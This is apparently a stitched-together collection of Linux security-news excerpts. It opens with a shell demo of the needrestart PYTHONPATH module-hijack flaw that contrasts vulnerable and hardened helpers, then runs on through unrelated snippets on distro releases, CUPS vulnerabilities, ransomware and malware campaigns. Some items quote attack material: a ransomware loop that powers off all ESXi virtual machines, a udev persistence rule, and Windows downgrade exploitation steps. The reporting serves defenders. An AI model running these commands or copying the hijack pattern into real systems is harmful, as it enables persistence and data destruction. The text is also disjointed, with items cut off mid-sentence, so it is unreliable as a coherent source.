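# standard module; the hardened helper scrubs the environment and uses -I.

# plant_shadow_module DIR MARKER: write a json.py into DIR that creates MARKER
# when imported. Stands in for the attacker-controlled PYTHONPATH entry.
plant_shadow_module() {
    cat > "$1/json.py" <<EOF
# constructed shadow module: side effect proves it ran instead of stdlib json
open("$2", "w").close()
EOF
}

# run_helper_vulnerable: the pattern needrestart had, environment inherited
# from the (unprivileged) caller, so "import json" consults PYTHONPATH first.
run_helper_vulnerable() {
    python3 -c 'import json' 2>/dev/null
}

# run_helper_hardened: same task, interpreter by absolute path, empty
# environment, isolated mode (-I ignores PYTHONPATH/PYTHONHOME and user site).
run_helper_hardened() {
    py=$(command -v python3) || return 1
    env -i "$py" -I -c 'import json' 2>/dev/null
}

# demo DIR: plants the shadow module in DIR, runs both helpers with
# PYTHONPATH=DIR and prints "vulnerable=<0|1> hardened=<0|1>", where 1 means
# the planted module executed.
demo() {
    dir=$1
    plant_shadow_module "$dir" "$dir/pwned"
    export PYTHONPATH="$dir"
    run_helper_vulnerable || true
    v=0; [ -e "$dir/pwned" ] && v=1
    rm -f "$dir/pwned"
    run_helper_hardened || true
    h=0; [ -e "$dir/pwned" ] && h=1
    unset PYTHONPATH
    echo "vulnerable=$v hardened=$h"
}

# Usage:  sh needrestart-class.sh --demo
if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d); demo "$d"; rm -rf "$d"
fi
```

The demo prints vulnerable=1 hardened=0. The same discipline applies to any interpreter a privileged tool spawns (PERL5LIB, RUBYLIB and friends), which is why the fix is to stop trusting the environment rather than to filter one variable.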
The five flaws are listed below -
- CVE-2024-48990 (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable
- CVE-2024-48991 (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by winning a race condition and tricking needrestart into running their own, fake Python interpreter
- CVE-2024-48992 (CVSS score: 7.8) -

Oracle Linux offers a secure, streamlined platform for deploying and managing applications across on-premises, cloud, and edge environments. Designed for demanding workloads, it includes tools for automation, virtualization, high availability, cloud-native development, Kubernetes, and more. Oracle Linux 9 Update 5 for the 64-bit Intel and AMD (x86_64) and 64-bit Arm (aarch64) platforms is now generally available. This release is packaged with the following kernel options: Unbreakable Enterprise Kernel (UEK) Release 7 Update 3, 5.15.0-302.167.6 for … More
The post Oracle Linux 9 Update 5 brings security updates, OpenJDK 17, .NET 9.0 appeared first on Help Net Security.
"Autosummary:
This release is packaged with the following kernel options: Unbreakable Enterprise Kernel (UEK) Release 7 Update 3, 5.15.0-302.167.6 for the x86_64 and aarch64 platforms Red Hat Compatible Kernel (RHCK), 5.14.0-503.11.1 for the x86_64 platform Security OpenSSL updated to version 3.2.2 – This significant update includes enhanced cryptographic operations and optimized RSA public key handling. "Autosummary:
The flaws were discovered by Qualys and are tracked as CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003. Needrestart is a utility commonly used on Linux, including on Ubuntu Server, to identify services that require a restart after package updates, ensuring that those services run the most up-to-date versions of shared libraries.
AlmaLinux is a free, open-source, enterprise-grade Linux distribution. Governed and owned by the community, it offers a production-ready platform with binary compatibility to Red Hat Enterprise Linux. AlmaLinux 9.5, codenamed Teal Serval, is now available. Security updates: The OpenSSL TLS toolkit is upgraded to version 3.2.2. OpenSSL now supports the certificate compression extension (RFC 8879) and Brainpool curves have been added to the TLS 1.3 protocol (RFC 8734). The SELinux policy now provides a boolean that … More
The post AlmaLinux 9.5 released: Security updates, new packages, and more! appeared first on Help Net Security.
Truesec, in an analysis published earlier this month, detailed Helldown attack chains that have been observed making use of internet-facing Zyxel firewalls to obtain initial access, followed by carrying out persistence, credential harvesting, network enumeration, defense evasion, and lateral movement activities to ultimately deploy the ransomware. Interlock is assessed to be a new group that sprang forth from Rhysida operators or developers, the company added, citing overlaps in tradecraft, tools, and ransomware behavior.
Microsoft has announced the Windows Resiliency Initiative, aimed at avoiding a repeat of the prolonged worldwide IT outage caused by a buggy CrowdStrike update that took down millions of Windows machines and rendered them remotely unfixable. As part of that initiative, the company has announced that it's working on Quick Machine Recovery, a feature that “will enable IT administrators to execute targeted fixes from Windows Update on PCs, even when machines are unable to boot, … More
The post Microsoft plans to boot security vendors out of the Windows kernel appeared first on Help Net Security.
Red Hat announced Red Hat Enterprise Linux 9.5. Red Hat Enterprise Linux helps organizations deploy applications and workloads more quickly and with greater reliability, enabling them to lower costs and more effectively manage workloads across hybrid cloud deployments while mitigating IT risks, from the datacenter to public clouds to the edge. According to IDC, “Organizations continue to find themselves at odds with striking the balance between maintaining their Linux operating system environments and the workloads … More
The post Red Hat Enterprise Linux 9.5 helps organizations simplify operations appeared first on Help Net Security.
In addition, Red Hat Enterprise Linux 9.5 now adds new file management capabilities to the web console, allowing users to perform routine file management tasks without using the command line, such as browsing the file system, uploading and downloading files, changing permissions and creating directories.
They further called out the value of automation, better scalability and access to Red Hat Enterprise Linux expertise,” said Greg Macatee, research manager, Infrastructure Software Platforms, Worldwide Infrastructure Research, IDC.
The activity, which has mainly targeted countries like Romania, Poland, Germany, and Kazakhstan, starts with a batch file present within the archive file.
Unknown attackers are trying to trick Windows users into spinning up a custom Linux virtual machine (VM) with a pre-configured backdoor, Securonix researchers have discovered.
The campaign
The attack began with a phishing email, they believe, but they weren’t able to pinpoint the intended victims. The email included a link pointing to an unusually big ZIP file (285 MB), and its name – OneAmerica Survey.zip – points to the likely lure: a survey by OneAmerica … More
The post Beware of phishing emails delivering backdoored Linux VMs! appeared first on Help Net Security.
If the user clicks on the shortcut file, a process is started wherein:
- The ZIP file is “unzipped” and its contents put into the user’s profile directory, into a directory called “datax”
- A batch processing (BAT) file is executed and it shows a decoy image saying there was an “Internal Server Error” while, in the background, a (renamed) QEMU process and command line is executed to start the emulated Tiny Core Linux environment
The customized Linux VM is meant to be used to create an interactive shell (essentially, a backdoor) on the host machine by initiating an SSH connection, through which the attackers can:
(Figure: Start.bat batch file installing the QEMU Linux virtual machine. Source: BleepingComputer) While the virtual machine is being installed, the same batch file will display a PNG file downloaded from a remote site that shows a fake server error as a decoy, implying a broken link to the survey.
OpenPaX is an open-source kernel patch that mitigates common memory safety errors, re-hardening systems against application-level memory safety attacks using a simple Linux kernel patch. It’s available under the same GPLv2 license terms as the Linux kernel. “We are pleased to be able to bring this to the industry at large and as an integrated offering for our customers with Edera Protect,” said Ariadne Conill, distinguished engineer at Edera and maintainer of Alpine Linux. “Until … More
The post OpenPaX: Open-source kernel patch that mitigates memory safety errors appeared first on Help Net Security.
Ultimately, the exploitation steps an attacker needs to follow are below:
- Turning off VBS in the Windows Registry, or invalidating SecureKernel.exe
- Downgrading ci.dll to the unpatched version
- Restarting the machine
- Exploiting the ItsNotASecurityBoundary DSE bypass to achieve kernel-level code execution
The only instance where it fails is when VBS is turned on with a UEFI lock and a "Mandatory" flag, the last of which causes boot failure when VBS files are corrupted.
"I was able to make a fully patched Windows machine susceptible to past vulnerabilities, turning fixed vulnerabilities unfixed and making the term “fully patched” meaningless on any Windows machine in the world" - Alon Leviev
Despite kernel security improving significantly over the years, Leviev managed to bypass the Driver Signature Enforcement (DSE) feature, showing how an attacker could load unsigned kernel drivers to deploy rootkit malware that disables security controls and hides activity that could lead to detecting the compromise.
The vulnerabilities impact Intel's 12th, 13th, and 14th chip generations for consumers and the 5th and 6th generation of Xeon processors for servers, along with AMD's Zen 1, Zen 1+, and Zen 2 processors.
There are six key LLM (Large Language Model) components that can be targeted by attackers:
- Prompt - Attacks like prompt injections, where malicious input is used to manipulate the AI's output
- Response - Misuse or leakage of sensitive information in AI-generated responses
- Model - Theft, poisoning, or manipulation of the AI model
- Training Data - Introducing malicious data to alter the behavior of the AI.
Using AI to Abuse AI: Introducing GPTs
GPTs, introduced by OpenAI on November 6, 2023, are customizable versions of ChatGPT that allow users to add specific instructions, integrate external APIs and incorporate unique knowledge sources.
(Figure: OpenAI protection)
AI Attacks and Risks
There are multiple frameworks existing today to assist organizations that are considering developing and creating AI-based software: the NIST Artificial Intelligence Risk Management Framework; Google's Secure AI Framework; the OWASP Top 10 for LLM Applications; and the recently launched MITRE ATLAS LLM Attack Surface.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-30088 (CVSS score 7.0) Microsoft Windows Kernel TOCTOU Race Condition Vulnerability; CVE-2024-9680 Mozilla Firefox Use-After-Free Vulnerability; CVE-2024-28987 (CVSS score 9.1)
In October 2018, the US-CERT released a joint technical alert from the DHS, the FBI, and the Treasury warning about the ATM cash-out scheme, dubbed “FASTCash,” being used by the prolific North Korean APT hacking group known as Hidden Cobra (aka Lazarus Group and Guardians of Peace).
Once the manipulated message is sent back to the bank's central systems containing the approval codes (DE38, DE39) and the amount (DE54), the bank approves the transaction, and a money mule acting on behalf of the hackers withdraws the cash from an ATM.
Canonical released Ubuntu 24.10 Oracular Oriole, which brings notable advancements, including an updated kernel, new toolchains, and the GNOME 47 desktop environment, along with significant enhancements in software security. “Oracular Oriole sets a new pace for delivering the latest upstream kernel and toolchains,” said Mark Shuttleworth, CEO of Canonical. “Experimental new security features demonstrate our commitment to continually elevate the Linux desktop experience in conversation with the community for the next 20 years and beyond.” … More
The post Ubuntu 24.10 Oracular Oriole brings tighter security controls appeared first on Help Net Security.
Expanded toolchain support with versioned Rust and Java TCK Certification
Ubuntu 24.10 brings expanded toolchain support, featuring the latest versions of Python, Java, Go, C, C++, Rust, and .NET, with .NET support now extended to the ppc64el architecture.
The scanner was created by cybersecurity researcher Marcus Hutchins (aka "MalwareTech"), who built it to help system administrators scan their networks and quickly identify devices running vulnerable cups-browsed services.
Thousands of Linux systems are likely infected with the highly elusive and persistent “perfctl” (or “perfcc”) cryptomining malware and many others still could be at risk of getting compromised, Aqua Security researchers revealed last week. “In all the attacks observed, the malware was used to run a cryptominer, and in some cases, we also detected the execution of proxy-jacking software,” they shared.
“Perfctl” malware
Though the actual cryptomining is performed by XMRIG Monero cryptomining software, … More
The post Linux systems targeted with stealthy “Perfctl” cryptomining malware appeared first on Help Net Security.
(Figure: The “perfctl” attack flow. Source: Aqua Security) The malware:
- Contains and uses an exploit for CVE-2021-4034 (aka PwnKit) to attempt to gain full root privileges
- Modifies existing scripts to ensure execution of the malware and suppression of mesg errors (that might point to malicious execution), and drops a binary that verifies the execution of the main payload
- Copies itself from memory to half a dozen other locations (with file names that mimic the names of conventional system files)
- Drops a rootkit to hide its presence and assure persistence, alter network traffic, etc.
This data includes host events, locations of the copies of itself, process names, communication logs, tokens, and additional log information.
New Perfctl Malware targets Linux servers in cryptomining campaign
Pierluigi Paganini, October 04, 2024
perfctl malware targets misconfigured Linux servers to deploy cryptocurrency miners and proxyjacking software in an ongoing campaign.
Additional userland rootkits are also deployed, replacing the ldd, top, crontab, and lsof utilities with trojanized versions, again preventing direct detection of the malware's activities.
Detecting and stopping perfctl
Aqua Nautilus proposes several ways for detecting and stopping perfctl, which fall into four main categories: system monitoring, network traffic analysis, file and process integrity monitoring, and proactive mitigation.
As an integral part of the Halcyon Anti-Ransomware Platform, Halcyon Linux offers protection against ransomware attacks targeting Linux systems. While ransomware operators were once almost exclusively focused on targeting Windows environments, the introduction of Linux variants represents a significant expansion of the addressable target range. In 2023, Linux-based ransomware attacks increased by 75%, yet Linux-based systems and endpoints are often overlooked and without ransomware defenses. “When it comes to ransomware protection, organizations typically prioritize securing … More
The post Halcyon offers ransomware protection for Linux environments appeared first on Help Net Security.
After much hyping and following prematurely leaked information by a third party, security researcher Simone Margaritelli has released details about four zero-day vulnerabilities in the Common UNIX Printing System (CUPS) that can be abused by remote, unauthenticated attackers to achieve code execution on vulnerable Linux and Unix-like systems.
The CUPS vulnerabilities
CUPS is an open-source printing system that allows a computer on which it is installed to act as a print server. It is developed by … More
The post CUPS vulnerabilities affecting Linux, Unix systems can lead to RCE appeared first on Help Net Security.
The vulnerabilities discovered by Margaritelli (aka EvilSocket) affect several CUPS components/packages:
- CVE-2024-47176, in the cups-browsed (up to version 2.0.1) helper daemon, which allows attackers to submit packets via the IPP default port (UDP 631) and trick it into requesting arbitrary, attacker-controlled URLs
- CVE-2024-47076, in libcupsfilters (up to version 2.1b1), which allows attackers to pass malicious data to other CUPS components
- CVE-2024-47175, in libppd (up to version 2.1b1), which allows attackers to inject malicious data in the temporary PPD file to pass to CUPS components
- CVE-2024-47177, in cups-filters (up to version 2.0.1), which allows attackers to execute arbitrary commands via the FoomaticRIPCommandLine PPD parameter
By chaining some of these flaws, “a remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP URLs with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer),” Margaritelli explained.
The list of vulnerabilities is as follows:
- CVE-2024-47176 - cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL
- CVE-2024-47076 - libcupsfilters <= 2.1b1
* Canonical, RedHat and… pic.twitter.com/N2d1rm2VeR — Simone Margaritelli (@evilsocket) September 23, 2024
Information about the Linux vulnerability was leaked on GitHub; for this reason, the Italian researcher decided to release the technical details and published a proof-of-concept (PoC) exploit on September 26, 2024. To stop a running cups-browsed service, an administrator should use the following command:
$ sudo systemctl stop cups-browsed
The cups-browsed service can also be prevented from starting on reboot with:
$ sudo systemctl disable cups-browsed
Blocking all traffic to UDP port 631 and DNS-SD traffic can also mitigate attacks. The researcher disclosed four vulnerabilities, tracked as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, impacting the CUPS (Common UNIX Printing System) open-source printing system.
No patches, but mitigation measures are available
While patches are still in development, Red Hat shared mitigation measures requiring admins to stop the cups-browsed service from running and prevent it from being started on reboot, using the following commands to break the exploit chain:
sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
Red Hat users can also use the following command to find out if cups-browsed is running on their systems:
sudo systemctl status cups-browsed
If the result displays "Active: inactive (dead)," then the exploit chain is halted, and the system is not vulnerable.
Hadooken hitting hard
Once the attackers breach an environment and get sufficient privileges, they download a shell script named "c" and a Python script named "y." The two scripts both drop Hadooken, but the shell code also tries to look for SSH data in various directories and uses the info to attack known servers, the researchers say.
New Linux malware called Hadooken targets Oracle WebLogic servers
Pierluigi Paganini, September 13, 2024
A new Linux malware called Hadooken targets Oracle WebLogic servers; it has been linked to several ransomware families.
Kali Linux 2024.3 is now available for download. Besides the new tools, this release mainly focuses on behind-the-scenes updates and optimization.
New tools in Kali Linux 2024.3
This Kali release is about new tools and package updates: goshs – Think SimpleHTTPServer, but written in Go, and with more features; graudit – Grep Rough AUDIT: source code auditing tool; gsocket – Allows two machines on different networks to communicate with each other; hekatomb – Extract and … More
The post Kali Linux 2024.3 released: 11 new tools, Qualcomm Snapdragon SDM845 SoC support appeared first on Help Net Security.
Below are the descriptions for these vulnerabilities: CVE-2016-3714 ImageMagick Improper Input Validation Vulnerability; CVE-2017-1000253 Linux Kernel PIE Stack Buffer Corruption Vulnerability; CVE-2024-40766 SonicWall SonicOS Improper Access Control Vulnerability. The CVE-2016-3714 flaw (aka ImageTragick) in the popular image manipulation software ImageMagick could allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image.
Red Hat Enterprise Linux (RHEL) AI is Red Hat’s foundation model platform, enabling users to develop, test, and run GenAI models to power enterprise applications. The platform brings together the open source-licensed Granite LLM family and InstructLab model alignment tools based on the Large-scale Alignment for chatBots (LAB) methodology, packaged as an optimized, bootable RHEL image for individual server deployments across the hybrid cloud. While GenAI’s promise is immense, the associated costs of procuring, training, … More
The post Red Hat Enterprise Linux AI extends innovation across the hybrid cloud appeared first on Help Net Security.
While GenAI’s promise is immense, the associated costs of procuring, training, and fine-tuning LLMs can be astronomical, with some leading models costing nearly $200 million to train before launch.
It should be noted that BlackCat/ALPHV encryptors also used random seven-character extensions and a ransom note named "RECOVER-[extension]-FILES.txt."
(Figure: Cicada3301 ransom note. Source: BleepingComputer) The ransomware's operators can set a sleep parameter to delay the encryptor's execution, potentially to evade immediate detection.
(Figure: Cicada3301 ransomware operator seeking affiliates on RAMP forums. Source: Truesec) Like other ransomware operations, Cicada3301 conducts double-extortion tactics where they breach corporate networks, steal data, and then encrypt devices.
Linux malware sedexp uses udev rules for persistence and evasion
Pierluigi Paganini, August 26, 2024
Researchers spotted a new stealthy Linux malware named sedexp that uses Linux udev rules to achieve persistence and evade detection.
The udev rule for sedexp -- ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="asedexpb run:+" -- is set up such that the malware is run whenever /dev/random (corresponding to device minor number 8) is loaded, which typically occurs upon every reboot.
Udev rules are text configuration files that dictate how the manager should handle certain devices or events, located in "/etc/udev/rules.d/" or "/lib/udev/rules.d/". These rules contain three parameters that specify their applicability (ACTION=="add"), the device name (KERNEL=="sdb1"), and what script to run when the specified conditions are met (RUN+="/path/to/script").
(Figure: Linux boot broken after Windows security update (Ok_Work_5257)) For those who have already installed the August 2024 Windows updates and can no longer boot Linux on their dual-boot devices, Microsoft recommends deleting the SBAT update and ensuring that future SBAT updates will no longer be installed.
The list of affected models is very long; it includes IPC-X3XXX, HX5XXX, HUM7XX, VTO75X95X, VTO65XXX, VTH542XH, PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, SD6AL, Thermal TPC-BF1241, TPC-BF2221, TPC-SD2221, TPC-BF5XXX, TPC-SD8X21, TPC-PT8X21B, NVR1XXX, NVR2XXX, NVR4XXX, NVR5XXX, NVR6XX.
Android Security Bulletin for August 2024 addressed a total of 47 vulnerabilities in Framework (13), System (1), Kernel (1), Arm components (2), Imagination Technologies (1), MediaTek components (1), Qualcomm components (21), and Qualcomm closed-source components (7).
Earlier this year, Google patched another zero-day exploited in attacks: a high-severity elevation of privilege (EoP) flaw in the Pixel firmware, tracked as CVE-2024-32896 by Google and CVE-2024-29748 by GrapheneOS (which found and reported the flaw).
SLUBStick exploits a heap vulnerability, such as a double-free, use-after-free, or out-of-bounds write, to manipulate the memory allocation process.
Manufacturing, professional services, construction, IT, retail, financial services, transportation, media, legal services, and real estate are some of the top industries affected by the Play ransomware during the time period.
To power off all running VMware ESXi virtual machines so that they can be encrypted, Trend Micro says the encryptor will execute the following code:
/bin/sh -c "for vmid in $(vim-cmd vmsvc/getallvms | grep -v Vmid | awk '{print $1}'); do vim-cmd vmsvc/power.off $vmid; done"
As BleepingComputer found while analyzing it, this variant is designed to specifically target VMFS (Virtual Machine File System), which is used by VMware's vSphere server virtualization suite.
"Not only that, they have developed a kernel component with a large set of techniques to manipulate processes, but they also went through the requirements imposed by Microsoft to obtain a code-signing certificate for their driver component."
Eldorado is the latest in the list of new double-extortion ransomware players that have sprung up in recent times, including Arcus Media, AzzaSec, dan0n, Limpopo (aka SOCOTRA, FORMOSA, SEXi), LukaLocker, Shinra, and Space Bears, once again highlighting the enduring and persistent nature of the threat.
"This vulnerability, if exploited, could lead to full system compromise where an attacker can execute arbitrary code with the highest privileges, resulting in a complete system takeover, installation of malware, data manipulation, and the creation of backdoors for persistent access.
"The vulnerability, which is a signal handler race condition in OpenSSH's server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems," Bharat Jogi, senior director of the threat research unit at Qualys, said in a disclosure published today.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2022-24816 GeoSolutionsGroup JAI-EXT Code Injection Vulnerability; CVE-2022-2586 Linux Kernel Use-After-Free Vulnerability; CVE-2020-13965 Roundcube Webmail Cross-Site Scripting (XSS) Vulnerability. Below are the descriptions of the flaws added to the KEV catalog: GeoServer Flaw CVE-2022-24816 (CVSS score of 9.8) is a code injection issue in the Jai-Ext open source project.
Experts found a bug in the Linux version of RansomHub ransomware
Pierluigi Paganini, June 22, 2024
The RansomHub ransomware operators added a Linux encryptor to their arsenal; the version targets VMware ESXi environments.
Includes "VirtualShine" (bash shell access through VMCI sockets), "VirtualPie" (file transfer, command execution, reverse shell), and "VirtualSphere" (controller transmitting the commands). The most recent attacks by UNC3886, according to Mandiant, targeted organizations in North America, Southeast Asia, and Oceania, with additional victims identified in Europe, Africa, and other parts of Asia.
(Figure: Configuration options and commands. Source: Recorded Future) It also features ESXi-specific commands and options, like "vim-cmd vmsvc/getallvms" and "vim-cmd vmsvc/snapshot.removeall" for snapshot deletion, and "esxcli vm process kill" for shutting down VMs.
SUSE announced a new SUSE Liberty Linux offering to help protect CentOS systems from future vulnerabilities. SUSE Liberty Linux Lite for CentOS 7 is a frictionless solution that provides customers with updates and security patches for their existing CentOS system, with no migration whatsoever. This gives customers the security and certainty of uninterrupted SUSE enterprise Linux support, without the hassle and disruption of switching OS on-premises or in the cloud. “Open source technologies are the … More
The post SUSE announces Liberty Linux Lite for CentOS 7 appeared first on Help Net Security.
“Open source technologies are the cornerstone of innovation for enterprises, fostering collaboration, agility, and cost-effectiveness,” said Rick Spencer, GM of Business Critical Linux, SUSE.
(Figure: TIKTAG-v2 code. Source: arxiv.org) If the tags match, the value is forwarded and the load succeeds, influencing the cache state, while in the case of a mismatch, the forwarding is blocked and the cache state remains unchanged.
When DISGOMOJI is launched, the malware will exfiltrate system information from the machine, including IP address, username, hostname, operating system, and the current working directory, which is sent back to the attackers.
It's equipped to launch a reverse shell, download/upload files, schedule execution, and initiate SOCKS tunneling, with the attacks leveraging known security flaws in public-facing applications to breach Linux servers and drop a web shell for remote access and malware delivery.
CVE-2024-4610 ARM Mali GPU Kernel Driver Use-After-Free Vulnerability; CVE-2024-4577 PHP-CGI OS Command Injection Vulnerability. The vulnerability CVE-2024-4610 is a use-after-free issue that impacts the Bifrost GPU Kernel Driver (all versions from r34p0 to r40p0) and the Valhall GPU Kernel Driver (all versions from r34p0 to r40p0).
Bifrost-based Mali GPUs are used in smartphones/tablets (G31, G51, G52, G71, and G76), single-board computers, Chromebooks, and various embedded systems.
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: High-risk Atlassian Confluence RCE fixed, PoC available (CVE-2024-21683) – If you’re self-hosting an Atlassian Confluence Server or Data Center installation, you should upgrade to the latest available version to fix a high-severity RCE flaw (CVE-2024-21683) for which a PoC and technical details are already public. Kali Linux 2024.2 released: 18 new tools, countless updates – Kali Linux 2024.2 is now available. It … More
The post Week in review: Atlassian Confluence RCE PoC, new Kali Linux, Patch Tuesday forecast appeared first on Help Net Security.
Infosec products of the month: May 2024 – Here’s a look at the most interesting products from the past month, featuring releases from: Abnormal Security, Adaptive Shield, Appdome, AuditBoard, Calix, Cranium, CyberArk, Cybersixgill, Dashlane, Datadog, Detectify, Eclypsium, ExtraHop, FireMon, Forcepoint, ManageEngine, OneTrust, OWASP Foundation, PlexTrac, Proofpoint, Secure Code Warrior, SentinelOne, Snyk, Splunk, Strike Graph, Sumo Logic, Synopsys, Trellix, and Truecaller. New infosec products of the week: June 7, 2024 – Here’s a look at the most interesting products from the past week, featuring releases from Appdome, SailPoint, Tines, Trend Micro, Verimatrix, and Zyxel Networks.
A new Linux version of TargetCompany ransomware targets VMware ESXi environments
Pierluigi Paganini, June 06, 2024
A new Linux variant of the TargetCompany ransomware family targets VMware ESXi environments using a custom shell script.
Kali 2024.2 doesn't disappoint, with eighteen new tools added in this release:
- autorecon - Multi-threaded network reconnaissance tool
- coercer - Automatically coerce a Windows server to authenticate on an arbitrary machine
- dploot - Python rewrite of SharpDPAPI
- getsploit - Command line utility for searching and downloading exploits
- gowitness - Web screenshot utility using Chrome Headless
- horst - Highly Optimized Radio Scanning Tool
- ligolo-ng - Advanced, yet simple, tunneling/pivoting tool that uses a TUN interface
- mitm6 - pwning IPv4 via IPv6
- netexec - Network service exploitation tool that helps automate assessing the security of large networks.
Kali Linux 2024.2 is now available. It includes future package compatibility for 32-bit platforms, improvements to GNOME 46 and Xfce, and 18 new tools.
Desktop changes
Kali 2024.2 introduces GNOME 46, offering a refined experience that builds on the enhancements from previous versions. The Xfce desktop has undergone specific changes for Kali-Undercover and HiDPI modes. These updates improve stability and include several minor bug fixes, ensuring better support for the latest desktop features. New tools … More
The post Kali Linux 2024.2 released: 18 new tools, countless updates appeared first on Help Net Security.
Also known as Mallox, FARGO, and Tohnichi, the TargetCompany ransomware operation emerged in June 2021 and has been focusing on database attacks (MySQL, Oracle, SQL Server) against organizations mostly in Taiwan, South Korea, Thailand, and India.
NethSecurity is a free, open-source Linux firewall that simplifies network security deployment. It integrates various security features into one platform, including firewalling, intrusion detection and prevention, antivirus, multi-WAN, DNS, and content filtering. NethSecurity has an intuitive interface that delivers real-time insights and control over network security. It is a centralized hub for monitoring and managing firewall activities, presenting essential information such as intrusion attempts, traffic patterns, and system health.
Fully featured Linux firewall
Some of …
The post NethSecurity: Open-source Linux firewall appeared first on Help Net Security.
Future plans and download
Version 8.0 was released recently, but the developers plan to release another major update in the coming months, which is set to include: Firewall Objects, Reporting, Conntrack UI, and Admin User Management from the UI. NethSecurity is available for free here.
Kaspersky has tested the tool on popular Linux distributions and confirmed it works on Red Hat Enterprise Linux, CentOS, Linux Mint, Ubuntu, SUSE, openSUSE, and Debian, among others.
The fix has been backported to multiple stable kernel versions as listed below: v5.4.269 and later, v5.10.210 and later, v6.6.15 and later, v4.19.307 and later, v6.1.76 and later, v5.15.149 and later, v6.7.3 and later. In late March 2024, a security researcher using the alias "Notselwyn" published a detailed write-up and proof-of-concept (PoC) exploit on GitHub, showcasing how to achieve local privilege escalation by exploiting the flaw on Linux kernel versions between 5.14 and 6.6.
08 Collects statistics about an arbitrary directory tree and reports: total number of subdirectories, total number of files, total size of files
09 Reports the configuration details of the affected computer: hostname, username, CPU, RAM, network interfaces, listing each interface name, MAC, IP, and IPv6 address
10 Configures a fallback shell to use when executing the shell command in operation 02.
The WIZVERA VeraPort integration installation program is used to manage additional security software (e.g., browser plug-ins, security software, identity verification software, etc.). The Kimsuky cyberespionage group (aka Springtail, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, APT43) was first spotted by Kaspersky researchers in 2013.
North Korea-linked Kimsuky used a new Linux backdoor in recent attacks
Pierluigi Paganini, May 19, 2024
Symantec warns of a new Linux backdoor used by the North Korea-linked Kimsuky APT in a recent campaign against organizations in South Korea.
ESET researchers released their deep-dive investigation into one of the most advanced server-side malware campaigns. It is still growing and has seen hundreds of thousands of compromised servers in its at least 15-year-long operation. The Ebury group and botnet have been involved in the spread of spam, web traffic redirections, and credential stealing over the years. In recent years, they have diversified to credit card and cryptocurrency theft. Additionally, Ebury has been deployed as a …
The post Ebury botnet compromises 400,000+ Linux servers appeared first on Help Net Security.
Victims include universities, small and large enterprises, internet service providers, cryptocurrency traders, Tor exit nodes, shared hosting providers, and dedicated server providers, to name a few. It is used to deploy additional malware to monetize the botnet (such as modules for web traffic redirection), proxy traffic for spam, perform adversary-in-the-middle attacks (AitM), and host supporting malicious infrastructure.
In early February 2024, researchers at the SW2 threat intelligence company reported on a campaign where Kimsuky used trojanized versions of various software solutions, e.g. TrustPKI and NX_PRNMAN from SGA Solutions, Wizvera VeraPort, to infect South Korean targets with Troll Stealer and the Go-based Windows malware GoBear. Based on the analysis of the campaign, the researchers believe that supply-chain attacks (software, trojanized installers, fake installers) represent the preferred attack method for North Korean espionage actors.
ESET's investigation has unearthed various methods the attackers use to deliver Ebury, including methods such as theft of SSH credentials, credential stuffing, infiltrating hosting provider infrastructure, exploitation of flaws in Control Web Panel (e.g., CVE-2021-45467), and SSH adversary-in-the-middle (AitM) attacks.
The monetization strategies vary, though, and they also include stealing credit card information entered into payment sites, redirecting web traffic to generate revenue from ads and affiliate programs, using compromised servers to send spam, and selling the captured credentials. The malware modules spread via the Ebury botnet, based on ESET's latest observations, are: HelimodProxy: Proxies raw traffic and relays spam by modifying the mod_dir.so Apache module, allowing the compromised server to run arbitrary commands and support spam campaigns.
One of the most advanced server-side malware campaigns is still growing, with hundreds of thousands of compromised servers, and it has diversified to include credit card and cryptocurrency theft.
Ten years ago we raised awareness of Ebury by publishing a white paper we called Operation Windigo, which documented a campaign that leveraged Linux malware for financial gain. The new paper, Ebury is alive but unseen: 400k Linux servers compromised for cryptocurrency theft and financial gain, goes into more detail about each of Ebury’s aspects, including many technical specifics.
As organizations increasingly adopt AI, they face unique challenges in updating AI models to keep pace with evolving threats while ensuring seamless integration into existing cybersecurity frameworks. In this Help Net Security interview, Pukar Hamal, CEO at SecurityPal, discusses the integration of AI tools in cybersecurity.
What are organizations’ main challenges when integrating AI into their cybersecurity infrastructures?
Companies are like organisms: constantly changing every second. Given the dynamic nature of companies, keeping AI models …
The post Strategies for preventing AI misuse in cybersecurity appeared first on Help Net Security.
Employing a layered security approach, including encryption, behavior monitoring, and automatic alerts for unusual activities, helps strengthen defenses.
"Away from the complex infrastructure of modern ransomware, junk-gun ransomware allows criminals to get in on the action cheaply, easily, and independently," Sophos said, describing it as a "relatively new phenomenon" that further lowers the cost of entry. "Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia," cybersecurity agencies from the Netherlands and the U.S., along with Europol's European Cybercrime Centre (EC3), said in a joint alert.
The development comes amid the emergence of new ransomware families like Evil Ant, HelloFire, L00KUPRU (an Xorist ransomware variant), Muliaka (based on the leaked Conti ransomware code), Napoli (a Chaos ransomware variant), Red CryptoApp, Risen, and SEXi (based on the leaked Babuk ransomware code) that have been spotted targeting Windows and VMware ESXi servers.
The agttydck malware, written in C++ and packed with UPX, performs several malicious actions: it logs activity in “/tmp/log.0” at startup and “/tmp/log.1” at completion, searches the root directory for encryptable directories, drops a ransom note in each directory, and encrypts all files, appending a “.L0CK3D” extension.
